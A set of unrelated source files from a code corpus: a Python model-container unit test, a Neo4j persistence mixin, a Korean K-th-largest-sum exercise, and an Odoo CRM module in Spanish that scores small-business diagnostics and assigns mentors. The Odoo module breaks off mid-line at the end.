\"\"\"\nseq_1: &seq_1\n typename: Sequential\n args:\n input_config:\n typename: Input\n args:\n name: input_seq_1\n shape:\n - null\n - 4\n layer_configs:\n - typename: Dense\n args:\n n_nodes: 5\n scope: seq1/layer1/dense\n\nseq_2:\n typename: Sequential\n args:\n input_config:\n typename: Input\n args:\n name: input_seq_2\n shape:\n - null\n - 5\n layer_configs:\n - typename: Dense\n args:\n n_nodes: 6\n scope: seq2/layer1/dense\n\ncon_1:\n typename: Container\n args:\n input_config:\n typename: Input\n args:\n name: input_seq_3\n shape:\n - null\n - 8\n model_configs:\n - <<: *seq_1\n name: seq_1\n output_config:\n typename: Tensor\n name: seq1/layer1/dense/output\n\"\"\"\n\n_MODELS = yaml.round_trip_load(_MODEL_DEFS)\n\n\nclass TestContainer(fixture.TestCase):\n \"\"\"Test Container class\"\"\"\n def test_fetch_sequences(self):\n \"\"\"Container can fetch variables correctly\"\"\"\n models, container = _get_models(\n self.get_scope(),\n [_MODELS['seq_1'], _MODELS['seq_2']],\n )\n\n self.assertEqual(\n container.get_parameters_to_train(),\n (\n models[0].get_parameters_to_train() +\n models[1].get_parameters_to_train()\n )\n )\n self.assertEqual(\n container.get_parameters_to_serialize(),\n (\n models[0].get_parameters_to_serialize() 
+\n                models[1].get_parameters_to_serialize()\n            )\n        )\n        self.assertEqual(\n            container.get_output_tensors(),\n            (\n                models[0].get_output_tensors() +\n                models[1].get_output_tensors()\n            )\n        )\n        self.assertEqual(\n            container.get_update_operations(),\n            (\n                models[0].get_update_operations() +\n                models[1].get_update_operations()\n            )\n        )\n\n    def test_nested_container(self):\n        \"\"\"Nested Container can fetch variables correctly\"\"\"\n        models, container = _get_models(\n            self.get_scope(),\n            [_MODELS['con_1']],\n        )\n        model = models[0].models['seq_1']\n        self.assertEqual(\n            container.get_parameters_to_train(),\n            model.get_parameters_to_train(),\n        )\n        self.assertEqual(\n            container.get_parameters_to_serialize(),\n            model.get_parameters_to_serialize(),\n        )\n        self.assertEqual(\n            container.get_output_tensors(),\n            model.get_output_tensors(),\n        )\n        self.assertEqual(\n            container.get_update_operations(),\n            model.get_update_operations(),\n        )\n\n\nclass ModelRetrievalTest(fixture.TestCase):\n    \"\"\"Test Model fetch mechanism\"\"\"\n    def test_retrieval(self):\n        \"\"\"Model is correctly retrieved\"\"\"\n        scope1 = '{}/foo'.format(self.get_scope())\n        scope2 = '{}/bar'.format(self.get_scope())\n\n        name = 'baz'\n        with nn.variable_scope(scope1):\n            model1 = nn.model.Graph(name=name)\n            self.assertIs(nn.get_model(name), model1)\n\n        with nn.variable_scope(scope2):\n            model2 = nn.model.Graph(name=name)\n            self.assertIs(nn.get_model(name), model2)\n\n        self.assertIs(nn.get_model('{}/{}'.format(scope1, name)), model1)\n        self.assertIs(nn.get_model('{}/{}'.format(scope2, name)), model2)\n","repo_name":"mthrok/luchador","sub_path":"tests/unit/nn/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"32860175713","text":"from utils.Logger import logging\nfrom services.tool_services.neo_service import NeoService\nimport pandas as pd\n\nclass Neo4jMixin:\n\n    def save_to_neo4j(self, label, x):\n        if type(x) == pd.Series:\n            x = x.to_dict()\n        self.neoService.create(label, **x)\n\n    def if_exists(self, label, _id):\n        try:\n            data = self.neoService.exec(\"match (n:{0}) where n._id=\\\"{1}\\\" return n\".format(label, _id)).data()\n        except Exception as e:\n            logging.exception(\"error occurred when checking if exists\")\n            return True\n\n        if data:\n            return True\n        else:\n            return False\n\n    def save_relation(self, relation):\n        relation_str = [ \"{0}:\\\"{1}\\\"\".format(k,v) for k,v in relation.items()]\n        relation_str = \"{\" +\",\".join(relation_str) + \"}\"\n\n        try:\n            data = self.neoService.exec(\"match (n1:{0})-[r:{4}]-(n2:{1}) where n1._id =\\\"{2}\\\" and n2._id =\\\"{3}\\\" return r\".format(\n                relation['from_type'],\n                relation['to_type'],\n                relation['from_id'],\n                relation['to_id'],\n                relation['name'])).data()\n            if data:\n                return\n\n        except Exception as e:\n            logging.exception(\"check duplicate error\")\n\n        sql = \"match (n1:{0}), (n2:{1}) where n1._id =\\\"{2}\\\" and n2._id =\\\"{3}\\\" create (n1)-[r:{4} {5}]->(n2)\".format(\n            relation['from_type'],\n            relation['to_type'],\n            relation['from_id'],\n            relation['to_id'],\n            relation['name'],\n            relation_str)\n        try:\n            self.neoService.exec(sql)\n        except Exception as e:\n            logging.error(\"create relation error\")\n            logging.exception(\"save relation 
error\")\n","repo_name":"Will-Holden/kb_demo","sub_path":"offline_processor/core/common/mixins/Neo4jMixin.py","file_name":"Neo4jMixin.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44778263826","text":"# k 번째 큰수\n# 현수는 1부터 100사이의 자연수가 적힌 N장의 카드를 가지고 있습니다.\n# 같은 숫자의 카드가 여러장 있을 수 있습니다. \n# 현수는 이 중 3장을 뽑아 각 카드에 적힌 수를 합한 값을 기록하려고 합니다.\n# 3장을 뽑을 수 있는 모든 경우를 기록합니다. \n# 기록한 값 중 K번째로 큰 수를 출력 하는 프로그램을 작성하세요.\n# 만약 큰 수부터 만들어진 수가 25 25 23 23 22 20 19......이고 K값이 3이라면 \n# K번째 큰 값 은 22입니다.\n# ▣ 입력설명\n# 첫 줄에 자연수 N(3<=N<=100)과 K(1<=K<=50) 입력되고, 그 다음 줄에 N개의 카드값이 입력 된다.\n# ▣ 출력설명\n# 첫 줄에 K번째 수를 출력합니다. K번째 수는 반드시 존재합니다.\n# ▣ 입력예제 1\n# 10 3\n# 13 15 34 23 45 65 33 11 26 42\n# ▣ 출력예제 1 \n# 143\n\n\nimport os\nimport sys\nimport time\n\npath=\"./3/\"\n\nfile_list=os.listdir(path)\nfile_list_in= [file for file in file_list if file.startswith('in')]\nfile_list_out= [file for file in file_list if file.startswith('out')]\nfile_list_in.sort()\nfile_list_out.sort()\n\ndef algorithm(length_input, count_input, list_input):\n sorted_list=list(reversed(sorted(list_input)))\n print(sorted_list)\n res=set()\n for i in range(length_input):\n for j in range(i+1, length_input):\n for k in range(j+1, length_input):\n res.add(sorted_list[i]+sorted_list[j]+sorted_list[k]) \n sorted_res=list(reversed(sorted(res)))\n print('답', sorted_res[count_input-1])\n \n # de_duplication_list = set(list_input)\n # sorted_list = list(reversed(sorted(de_duplication_list)))\n # print(sorted_list)\n\n \n\nfor file in file_list_in:\n sys.stdin=open(path + file, 'rt')\n n, k = map(int, input().split())\n a=sorted(list(map(int, input().split())), reverse=True)\n algorithm(n, k, a)\n# print(n, k)\n# print(a)\n \n\n\n","repo_name":"upatisariputa/python_algorithm","sub_path":"2/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34796020756","text":"# -*- coding: utf-8 -*-\nfrom odoo import fields, models, api, SUPERUSER_ID, _\nfrom odoo.exceptions import ValidationError\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import datetime, timedelta\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\nfrom lxml import etree\nimport json\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nRANGES = {\n 'incipiente': range(0, 48),\n 'confiable': range(48, 94),\n 'competente': range(94, 133),\n 'excelencia': range(133, 156)\n }\n\nCRM_DIAGNOSTIC_SELECTION_FIELDS = {\n 'doctype': 'tipo_documento',\n 'x_ubic': 'ubicacion',\n 'x_forma41': 'actividad_micronegocio',\n 'x_microneg': 'tipo_micronegocio',\n }\n\nANSWER_VALUES = {\n 'si': 5,\n 'en_proceso': 3,\n 'parcialmente' : 3,\n 'no': 1,\n 'cuenta_del_negocio' : 5,\n 'cuenta_personal' : 5,\n 'los_dos_tipos_cuenta' : 5,\n 'no_tiene' : 1,\n 'no_empleados' : 5,\n 'no_regulaciones' : 5,\n }\n\nTEXT_VALUATION = {\n 1: 'Incipiente',\n 2: 'Confiable',\n 3: 'Confiable',\n 4: 'Competente',\n 5: 'Excelencia'\n }\n\nM2M_FIELDS = ['x_neg6', 'x_neg5', 'x_mer_com32', 'x_mer_com34', 'x_forma51']\n\nSELECTION_FIELDS = [\n 'x_innova_org_1', 'x_innova_org_2', 'x_innova_org_3', 'x_innova_org_4', 'x_innova_org_5',\n 'x_innova_org_6', 'x_neg4','x_neg7', 'x_neg8', 'x_neg14', 'x_financiero18',\n 'x_financiero20', 'x_financiero21', 'x_financiero22', 'x_financiero23', 'x_financiero24',\n 'x_financiero25', 'x_mer_com30', 'x_mer_com31', 'x_mer_com38', 'x_mer_com39',\n 'x_forma44', 
'x_forma45', 'x_forma46', 'x_forma47_1', 'x_forma49_1',\n 'x_neg16', 'x_financiero26', 'x_fin97n'\n ]\n\nSELECTION_FIELDS_WO_POINTS = [\n 'x_neg16', 'x_financiero26', 'x_fin97n'\n ]\n\nSUGGEST_VALUATION = {\n # 1\n 'x_innova_org_1': {\n 1: 'Remitir a talleres o cursos de innovación con el objetivo de prototipar y lanzar nuevos productos o servicios en su micronegocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 2\n 'x_innova_org_2': {\n 1: 'Buscar y explicar de nuevas herramientas tecnológicas que puedan mejorar los procesos o productividad del micronegocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 3\n 'x_innova_org_3': {\n 1: 'Acompañar y capacitar acerca de hábitos de planeación y organización, así como el diseño de un registro para llevar el cumplimiento de un plan y las metas',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 4\n 'x_innova_org_4': {\n 1: 'Acompañar y capacitar aspectos de planeación estratégica, así como la definición de una misión, visión y objetivos a largo plazo del micronegocio',\n 2: 'Revisar y hacer sugerencias acerca de la misión, visión y objetivos a largo plazo del micronegocio',\n 3: 'Revisar y hacer sugerencias acerca de la misión, visión y objetivos a largo plazo del micronegocio',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 5\n 'x_innova_org_5': {\n 1: 'Acompañar y capacitar acerca de la elaboración y seguimientos de los registros de inventario',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 6\n 'x_innova_org_6': {\n 1: 'Identificar alternativas y/o acciones necesarias para adecuar su espacio de trabajo',\n 2: 'Revisar y hacer sugerencias acerca de los cambios necesarios para adecuar correctamente su espacio de trabajo',\n 3: 'Revisar y hacer sugerencias acerca de los cambios necesarios para adecuar correctamente su espacio de trabajo',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 7\n 'x_neg4': {\n 1: 'Definir para quién está creando valor y quienes son sus clientes más importantes y la posibilidad de agrupar estos por medio de sus características, definir como aumentar su satisfacción',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 8 \n 'x_neg6': {\n 1: 'Ajustar los canales comerciales de acuerdo a la propuesta de valor y sus clientes',\n 2: 'Requiere explorar más canales , afinarlos y ponerlos a funcionar',\n 3: 'Requiere explorar más canales , afinarlos y ponerlos a funcionar',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 9\n 'x_neg7': {\n 1: 'Buscar apoyo en herramientas tecnológicas o registros donde pueda llevar el control y supervisión de los clientes para generar estrategias de fidelización y compra más frecuente',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 10\n 'x_neg8': {\n 1: '',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 14\n 'x_neg14': {\n 1: 'Gestionar acuerdos con proveedores',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 15\n 'x_neg16': {\n 0: 'Definir el valor que quiere entregar a sus clientes, clarificar que problemas o dolores quiere ayudar a resolver, validar si los productos y/o servicios ofrecidos, realmente solucionan problemas o satisfacen las necesidades de los clientes',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 17\n 'x_financiero18': {\n 1: 'Orientar al propietario del negocio acerca de los hábitos positivos financieros y la importancia de llevar registros económicos',\n 2: '',\n 3: '',\n 4: 
'',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 19\n 'x_financiero20': {\n 1: 'Orientar al propietario del negocio acerca de los hábitos positivos financieros y la importancia de llevar registros económicos',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 20\n 'x_financiero21': {\n 1: 'Acompañar y explicar el proceso para calcular el punto de equilibrio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 21\n 'x_financiero22': {\n 1: 'Acompañar y explicar los beneficios de la Inclusión financiera para el acceso a los productos del sistema bancario',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 22\n 'x_financiero23': {\n 1: 'Explicar procesos de agrupación y reestructuración de los pagos de la deuda, idealmente para que todo quede asociado a un solo acreedor',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 23\n 'x_financiero24': {\n 1: 'Remitir a un asesor de una entidad bancaria para que realicen el proceso de asesoramiento y determinación del monto máximo de endeudamiento',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 24\n 'x_financiero25': {\n 1: 'Acompañar y capacitar aspectos de educación financiera para la búsqueda e implementación de una herramienta (Excel, SIIGO) que permita realizar los registros contables del negocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 25\n 'x_financiero26': {\n 0: 'Remitir a la Cooperativa Minuto de Dios',\n 'area': 'FINANZAS'\n },\n # 27\n 'x_neg5': {\n 1: 'Definir el valor que quiere entregar a sus clientes, clarificar que problemas o dolores quiere ayudar a resolver, validar si los productos y/o servicios ofrecidos, realmente solucionan problemas o satisfacen las necesidades de los clientes',\n 2: 'Validar los productos y/o servicios ofrecidos, para lograr asegurar que realmente solucionan problemas o satisfacen las necesidades de los clientes',\n 3: 'Validar los productos y/o servicios ofrecidos, para lograr asegurar que realmente solucionan problemas o satisfacen las necesidades de los clientes',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 28\n 'x_mer_com30': {\n 1: 'Acompañar en el diseño de estrategias para la visibilidad de los productos o servicios',\n 2: 'Acompañar en el diseño de estrategias para la visibilidad de los productos o servicios',\n 3: 'Acompañar en el diseño de estrategias para la visibilidad de los productos o servicios',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 29\n 'x_mer_com31': {\n 1: 'Acompañar en el diseño de estrategias para la visibilidad de los productos o servicios',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 30\n 'x_mer_com32': {\n 1: 'Acompañar en la identificación de oportunidades de mercado y nuevos segmentos de clientes',\n 2: 'Acompañar en la definición del plan de marketing',\n 3: 'Acompañar en la definición del plan de marketing',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 32\n 'x_mer_com34': {\n 1: 'Acompañar en el diseño de estrategias para la visibilidad de los producto o servicios',\n 2: 'Acompañar en la definición del plan de marketing',\n 3: 'Acompañar en la definición del plan de marketing',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 34\n 'x_mer_com38': {\n 1: 'Acompañar en el uso de redes sociales para promocionar y posicionar su negocio y productos',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 35\n 'x_mer_com39': 
{\n 1: 'Acompañar en el uso de herramientas digitales para promoción de sus productos (uso de redes sociales o el desarrollo de páginas web)',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 36\n 'x_forma44': {\n 1: 'Acompañar y asesorar en los procesos para la formalización del negocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 37\n 'x_forma45': {\n 1: 'Acompañar y asesorar en los procesos para la formalización del negocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 38\n 'x_forma46': {\n 1: 'Acompañar y asesorar en los procesos para la formalización del negocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 40\n 'x_forma47_1': {\n 1: 'Acompañar y asesorar en los procesos de pagos parafiscales para sus empleados',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 43\n 'x_forma49_1': {\n 1: 'Revisar las regulaciones del sector y plantear con el propietario un plan de trabajo para empezar a cumplirlas',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 44\n 'x_fin97n': {\n 0: 'Remitir al programa de Empleabilidad',\n 'area': 'FORMALIZACION'\n },\n}\n\nclass CrmLead(models.Model):\n _inherit = 'crm.lead'\n\n\n crm_lead_id = fields.One2many(\n 'crm.diagnostic',\n 'lead_id',\n string='CRM Diagnostic',\n copy=False)\n\n mentors = fields.Many2one(\n 'res.partner',\n string='Mentores',\n )\n\n coordinador = fields.Many2one(\n 'res.users',\n string='Coordinador'\n )\n diagnostico = fields.Selection(\n selection=[\n ('competitividad', 'Nivel de competitividad'),\n ('incipiente', 'Incipiente'),\n ('aceptable', 'Aceptable'),\n ('confiable', 'Confiable'),\n ('competente', 'Competente'),\n ('excelencia', 'Excelencia')],\n string='Diagnostico'\n )\n # computed fields\n first_module_ready = fields.Boolean(\n compute='compute_first_module'\n )\n second_module_read = fields.Boolean(\n compute='compute_second_module'\n )\n third_module_ready = fields.Boolean(\n compute='compute_third_module'\n )\n four_module_read = fields.Boolean(\n compute='compute_four_module'\n )\n current_user = fields.Many2one(\n 'res.users',\n compute='get_current_user'\n )\n root_current_user = fields.Boolean(\n compute='current_user_is_root'\n )\n current_user_facilitator = fields.Boolean(\n compute='current_user_is_facilitator'\n )\n current_user_mentor = fields.Boolean(\n compute=\"current_user_is_mentor\"\n )\n current_user_admin = fields.Boolean(\n compute=\"current_user_is_admin\"\n )\n\n social_plan = fields.Boolean(default = False)\n\n facilitator_role = fields.Char(compute=\"get_facilitator_role\")\n\n show_action_set_rainbowman = fields.Boolean(compute=\"compute_show_action_set_rainbowman\")\n\n\n def confirm_social_plan(self):\n stage_after = self.env['crm.stage'].search([('stage_after_confirm_social_plan', '=', True)])\n for lead in self:\n lead.social_plan = True\n if stage_after:\n lead.with_user(SUPERUSER_ID).stage_id = stage_after[0]\n\n # returning an action to go to the crm.diagnostic form view related to the lead\n def action_crm_diagnostic_view(self):\n for record in self:\n # avoid running the diagnostic while the three question modules have not been completed yet\n if (not record.is_cordinator() or not record.is_orientador()) and (not record.first_module_ready or not record.second_module_read or not record.third_module_ready):\n raise ValidationError('Para realizar el diagnostico, debe responder las preguntas de los 3 modulos.')\n crm_diagnostic_vals = record.getting_values_to_crm_diagnostic()\n crm_diagnostic_id = self.env['crm.diagnostic'].create(crm_diagnostic_vals)\n crm_diagnostic_id._get_lines_for_areas()\n _logger.info(crm_diagnostic_id.read())\n crm_diagnostic_id.valuacion_diagnostico = record.diagnostico\n return record.action_to_return_to_crm_diagnostic(crm_diagnostic_id)\n\n # return a dict of values for crm.diagnostic\n def getting_values_to_crm_diagnostic(self):\n for lead in self:\n dic_vals = {\n 'lead_id': lead.id,\n 'fecha': fields.Date.today(),\n 'nombre_negocio': lead.x_nombre_negocio,\n 'nombre_propietario': lead.x_nombre,\n 'numero_identificacion': lead.x_identification,\n 'crm_diagnostic_line_ids': []\n }\n dic_sel_fields = lead.getting_selection_fields_to_dignostic_form(lead)\n dic_vals.update(dic_sel_fields)\n results = lead.prepare_diagnostic_lines(lead)\n innovation = []\n bussiness = []\n formalization = []\n marketing = []\n finance = []\n\n for result in results:\n if 'INNOVACION' in result:\n innovation.append(result.get('INNOVACION'))\n if 'MODELO DE NEGOCIO' in result:\n bussiness.append(result.get('MODELO DE NEGOCIO'))\n if 'FORMALIZACION' in result:\n formalization.append(result.get('FORMALIZACION'))\n if 'MERCADEO Y COMERCIALIZACION' in result:\n marketing.append(result.get('MERCADEO Y COMERCIALIZACION'))\n if 'FINANZAS' in result:\n finance.append(result.get('FINANZAS'))\n\n if len(innovation):\n puntaje1 = 0\n count1 = 0\n for dic in innovation:\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje1 += int(dic.get('puntaje'))\n count1 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n # fixed: read the score from the values dict at index 2 (was dic[1], the int command flag)\n puntaje1 += int(dic[2].get('puntaje'))\n count1 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion1'] = puntaje1\n\n if puntaje1 in range(0,10):\n valoracion = 'Incipiente'\n elif puntaje1 in range(10,19):\n valoracion = 'Confiable'\n elif puntaje1 in range(19,27):\n valoracion = 'Competente'\n elif puntaje1 > 26:\n valoracion = 'Excelencia'\n dic_vals['valoracion_innovation'] = valoracion\n\n if len(bussiness):\n puntaje2 = 0\n count2 = 0\n for dic in bussiness:\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje2 += int(dic.get('puntaje'))\n count2 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje2 += int(dic[2].get('puntaje'))\n count2 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion2'] = puntaje2\n\n if puntaje2 in range(0,9):\n valoracion = 'Incipiente'\n elif puntaje2 in range(9,16):\n valoracion = 'Confiable'\n elif puntaje2 in range(16,22):\n valoracion = 'Competente'\n elif puntaje2 > 21:\n valoracion = 'Excelencia'\n dic_vals['valoracion_neg'] = valoracion\n\n if len(formalization):\n puntaje3 = 0\n count3 = 0\n for dic in formalization:\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje3 += 
int(dic.get('puntaje'))\n count3 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje3 += int(dic[2].get('puntaje'))\n count3 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion3'] = puntaje3\n\n if puntaje3 in range(0,9):\n valoracion = 'Incipiente'\n elif puntaje3 in range(9,16):\n valoracion = 'Confiable'\n elif puntaje3 in range(16,23):\n valoracion = 'Competente'\n elif puntaje3 > 22:\n valoracion = 'Excelencia'\n dic_vals['valoracion_forma'] = valoracion\n\n if len(marketing):\n puntaje4 = 0\n count4 = 0\n for dic in marketing:\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje4 += int(dic.get('puntaje'))\n count4 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje4 += int(dic[2].get('puntaje'))\n count4 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion4'] = puntaje4\n\n if puntaje4 in range(0,12):\n valoracion = 'Incipiente'\n elif puntaje4 in range(10,22):\n valoracion = 'Confiable'\n elif puntaje4 in range(19,31):\n valoracion = 'Competente'\n elif puntaje4 > 30:\n valoracion = 'Excelencia'\n dic_vals['valoracion_merca'] = valoracion\n\n if len(finance):\n puntaje5 = 0\n count5 = 0\n for dic in finance:\n count5 += 1\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje5 += int(dic.get('puntaje'))\n count5 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje5 += int(dic[2].get('puntaje'))\n count5 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion5'] = puntaje5\n \n if puntaje5 in range(0,13):\n valoracion = 'Incipiente'\n elif puntaje5 in range(13,25):\n valoracion = 'Confiable'\n elif puntaje5 in range(25,35):\n valoracion = 'Competente'\n elif puntaje5 > 34:\n valoracion = 'Excelencia'\n dic_vals['valoracion_finanza'] = valoracion\n\n _logger.info(\"?\"*500)\n _logger.info(dic_vals)\n return dic_vals\n\n @api.model\n def _get_valoracion_bio(self, puntaje):\n if puntaje <= 2:\n valoracion = 'Incipiente'\n elif puntaje == 3:\n valoracion = 'Confiable'\n elif puntaje == 4:\n valoracion = 'Competente'\n elif puntaje >= 5:\n valoracion = 'Excelencia'\n\n return valoracion\n\n\n # getting str values from selection fields\n @api.model\n def getting_selection_fields_to_dignostic_form(self, lead):\n dic_fields = lead.read()[0]\n dic_selection_fields = {}\n for k, v in CRM_DIAGNOSTIC_SELECTION_FIELDS.items():\n for key in dic_fields:\n if k == key:\n dic_selection_fields[v] = dict(lead._fields[k].selection).get(getattr(lead, k))\n return dic_selection_fields\n\n # return a list of values to create diagnostic lines\n @api.model\n def prepare_diagnostic_lines(self, lead):\n lines = []\n lines_dict = []\n dic_fields = lead.read()[0]\n _fields = self.env['ir.model.fields'].search(\n [('name', 'ilike', 'x_'),\n ('model_id.model', '=', lead._name)]).filtered(\n lambda f : f.name.startswith('x_'))\n puntaje = 0\n for field in _fields:\n field_value = dic_fields.get(field.name)\n # TODO\n # validating if the field value is in ANSWER_VALUES\n # we obtain certain values from lead on its field what is iterating\n if field.ttype == 'selection' and field.name in SELECTION_FIELDS:\n if field_value in ANSWER_VALUES:\n answer 
= dict(lead._fields[field.name].selection).get(getattr(lead, field.name))\n score = ANSWER_VALUES.get(field_value)\n if field.name in SELECTION_FIELDS_WO_POINTS and answer == 'Si':\n score = 0\n valuation = TEXT_VALUATION.get(score)\n suggestion, area = self.get_sugestion(field.name, score)\n if area:\n values = {\n 'name': field.field_description,\n 'respuesta': answer,\n 'puntaje': score,\n 'area': area,\n 'sugerencia': suggestion,\n 'valoracion': valuation,\n }\n lines_dict.append({area:values})\n if score and area:\n puntaje += score\n if field.ttype == 'many2many' and field.name in M2M_FIELDS:\n if field.name == 'x_forma51':\n continue\n answers = getattr(lead, field.name)\n score = 0\n for answer in answers:\n score += answer.puntaje\n if score > 5:\n score = 5\n valuation = TEXT_VALUATION.get(score)\n suggestion, area = self.get_sugestion(field.name, score)\n if area:\n values = {\n 'name': field.field_description,\n 'respuesta': answers,\n 'puntaje': score,\n 'area': area,\n 'sugerencia': suggestion,\n 'valoracion': valuation,\n }\n lines_dict.append({area:values})\n if score and area:\n puntaje += score\n self.set_diagnostico(puntaje, lead)\n return lines_dict\n\n # set diagnostico based on the score range\n @api.model\n def set_diagnostico(self, score, lead):\n _logger.info(score)\n for k, v in RANGES.items():\n if score in v:\n lead.diagnostico = k\n\n # this method is called from cron\n def relate_events_to_leads(self):\n lead_ids = self.search(\n [('mentors', '=', False),\n ('diagnostico', 'in', ('incipiente', 'confiable', 'competente'))])\n if not lead_ids:\n return\n event_ids = self.available_events().sorted(reverse=True)\n if not event_ids:\n return\n for lead in lead_ids:\n if event_ids and lead_ids:\n event_ids[0].opportunity_id = lead.id\n lead.mentors = event_ids[0].partner_ids[0]\n self.send_mail_notification(lead)\n event_ids -= event_ids[0]\n lead_ids -= lead\n self.env.cr.commit()\n\n # date for switching permissions\n def valide_fecha(self):\n fecha = self.env['res.company'].browse([1])\n fecha_hoy = datetime.today().date()\n if fecha.fechalimite < fecha_hoy:\n rol = self.env['res.users.role'].search([('role_type' , '=', \"facilitador\")])\n lista_permisos =[]\n lista_permisos1 =[]\n for roles in rol:\n for grupo in roles.implied_ids:\n if grupo.name == \"Usuario: Solo mostrar documentos propios\":\n lista_permisos.append((5,grupo.id))\n else:\n permiso_de_inactivacion = self.env['res.groups'].search([('name', '=', 'Usuario: Inactivar CRM')])\n lista_permisos1.append((4, permiso_de_inactivacion.id))\n lista_permisos1.append((4,grupo.id))\n\n rol.write({\"implied_ids\" : lista_permisos})\n rol.write({\"implied_ids\" : lista_permisos1})\n\n # send email notification to coordinador and facilitador\n @api.model\n def send_mail_notification(self, lead_id):\n try:\n template_id = self.env.ref('crm_diagnostic.q_mail_template_event_notification')\n template_id.send_mail(lead_id.id, force_send=False)\n except Exception as e:\n print(e)\n\n # return available events\n def available_events(self):\n # weekday(): Monday=0 .. Sunday=6, so range(1, 6) keeps Tuesday through Saturday\n week_days = range(1, 6)\n date_to_search = fields.Datetime.now().replace(hour=0, minute=0) + timedelta(days=1)\n events = self.env['calendar.event'].search(\n [('start_datetime', '>', date_to_search),\n ('opportunity_id', '=', False)])\n _logger.info(events)\n for event in events:\n if event.start_datetime.weekday() not in week_days:\n events -= event\n _logger.info(len(events))\n return events\n\n # returning area and suggestion based on field_name and score\n @api.model\n def get_sugestion(self, field_name, score):\n # default to False so callers always get a (suggestion, area) pair,\n # even for fields without an entry in SUGGEST_VALUATION (previously\n # these names were left 